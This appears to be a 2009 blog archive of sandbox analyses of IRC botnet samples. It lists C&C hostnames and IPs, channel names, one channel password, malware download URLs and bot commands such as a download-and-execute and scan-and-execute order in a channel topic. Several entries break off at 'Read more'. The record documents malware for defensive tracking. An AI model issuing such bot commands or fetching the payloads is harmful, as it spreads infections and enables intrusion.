Month: May 2009

serv01.colo.owned.hu/foro.melodiasmoviles.com

Uncategorized

– DNS Queries:serv01.colo.owned.hu DNS_TYPE_A 87.234.140.73 1 foro.melodiasmoviles.com DNS_TYPE_A 1 – HTTP Conversations: From ANUBIS:1033 to 74.52.56.242:80 – [foro.melodiasmoviles.com] Request: GET /…/lol.exe Response: 200 “OK” – IRC Conversations: 87.234.140.73:31091 Nick: user|61Username: user|61Joined Channel: #support# with Password syslockChannel Topic for Channel #support#: “! dlx foro.melodiasmoviles.com/…/sshbx5.exe;! scanexec tty1.exe $ip 0”

teek.ihshsd8.com (Baadshah from #bottalk next server)

Uncategorized

– DNS Queries:teek.ihshsd8.com– HTTP Conversations: From ANUBIS:1039 to 72.10.169.26:80 – [72.10.169.26] Request: GET /newpack.exe Response: 200 “OK” – IRC Conversations: From ANUBIS:1034 to 72.10.172.218:9928 Nick: QkmESFPjUsername: keiqylJoined Channel: #siwaChannel Topic for Channel #siwa: “=sns+a5P/xtPiMMQV3WArMqVpEo5yf63afj9I5m9v8Yb8jQyjvrOao6a1D2ggD/yKpW9RhWz0X53yvkkpx6XNxUvY9j4LTZ4T50pVxGMhIxZj7mZxfpCQ2yznwKlKtnHwcB”

rs.wtfbbqz.info

Uncategorized

– IRC Conversations:221.11.6.203:7007Nick: [P00|USA|31740]Username: XP-4976Joined Channel: ##security

xx.ka3ek.com/channellili5.com/zonetech.info

Uncategorized

– DNS Queries:Name Query Type Query Result Successful Protocol xx.ka3ek.com DNS_TYPE_A 67.43.226.242 1 … DNS_TYPE_A 0 channellili5.com DNS_TYPE_A 0 zonetech.info DNS_TYPE_A 72.10.166.195 1 – HTTP Conversations:72.10.166.195:80 – [zonetech.info] Request: GET /ns6.exe Response: 200 “OK” – IRC Conversations:67.43.226.242:8080 Nick: VndhdZPkUsername: nhymppJoined Channel: #las6Channel Topic for Channel #las6: “=AMZ7AvE/iLXeUnAvUfZPqMvDThxwZSF004FsQnPnjGBPYx8MEknE73CtRA2GdWniEL9hzXmawnM1YrBnc28RA/9z7kQh/g203Sh+tcfAj7W8ar0Ag0HcmdwB7KTzFAe3dlqfGsZ/YaUNJjJvhXKQ+8tnPxENLQqy3mmwMYFsGbuCnShS3fqKrOolhS8UGlttitdMDTAUIXTTgWxC”Private Message to Channel #las6: “-^C042^C- Running TFTP wormrideRead more...

proxim.ntkrnlpa.info

Uncategorized

– DNS Queries:proxim.ntkrnlpa.info– IRC Conversations:83.68.16.30:80 Nick: znmipplyUsername: z020501Private Message to User &virtu3: “” – DNS Queries:millanchannel.info – HTTP Conversations:67.18.161.250:80 – [millanchannel.info] Request: GET /uddb.exe Response: 200 “OK” Request: GET /uddb.exe Response: 200 “OK”

irc.johnny.gr

Uncategorized

– DNS Queries:irc.johnny.gr– IRC Conversations:89.163.182.24:1836Nick: USA|97757Username: pesxwJoined Channel: ##pia

nadsam0.info and ss.ka3ek.com

Uncategorized

– DNS Queries:Name Query Type Query Result Successful Protocolss.ka3ek.com DNS_TYPE_A 67.43.232.36 1 nadsam0.info DNS_TYPE_A 72.10.167.74 1 – HTTP Conversations:72.10.167.74:80 – [nadsam0.info] Request: GET /x.exe Response: 200 “OK” Request: GET /is.exe Response: 200 “OK” Request: GET /laslas.exe Response: 200 “OK” – IRC Conversations:67.43.232.36:10324Nick: VyJodwfXUsername: woowfkJoined Channel: #rsJoined Channel: #proxxJoined Channel: #kok6Joined Channel: #63Channel Topic for ChannelRead more...

proxim.ircgalaxy.pl and dl2.teenpassage.com

Uncategorized

– DNS Queries:proxim.ircgalaxy.pl DNS_TYPE_A 210.245.211.11 1 wpad DNS_TYPE_A 0 dl2.teenpassage.com DNS_TYPE_A 85.114.141.207 1 – HTTP Conversations:85.114.141.207:80 – [dl2.teenpassage.com] Request: GET /DONT-TOUCH/pa.exe – HTTP Conversations: 115.126.2.110:80 – [www.upononjob.cn] Request: GET /set/lgate.php Response: 200 “OK” Request: GET /docs/irv.txt Response: 200 “OK” Request: GET /docs/doc.txt Response: 200 “OK” Request: GET /docs/tips.txt Response: 200 “OK” Request: GET /in.cgi?0032 Response:Read more...

millanchannel.info (Baadshah from #bottalk second botnet)

Uncategorized

– DNS Queries:millanchannel.info – HTTP Conversations: 92.48.75.63:80 – [millanchannel.info]Request: GET /uddb.exeResponse: 200 “OK”Request: GET /uddb.exeResponse: 304 “Not Modified” – HTTP Conversations: 72.10.169.26:80 – [72.10.169.26]Request: GET /ssvc.exeResponse: 200 “OK” – IRC Conversations: 72.10.169.26:2569Nick: fpNWLXVfUsername: ewambnJoined Channel: ##russia##Channel Topic for Channel ##russia##: “=dphtYucrsh1S2Lp/Iah/dudBcoYuLymU7nu+UAHBCer23eQTNteOzdaveWqqR8QeZx8vQyyqlxdq5hvnyYvtkRtc5r6f1fpdFZpTJvfpFzLWUE0CaSQhDN3yBqfMiB” ssvc.exe infos – DNS Queries: Name Query Type Query Result Successful Protocol s.bigolder.info DNS_TYPE_ARead more...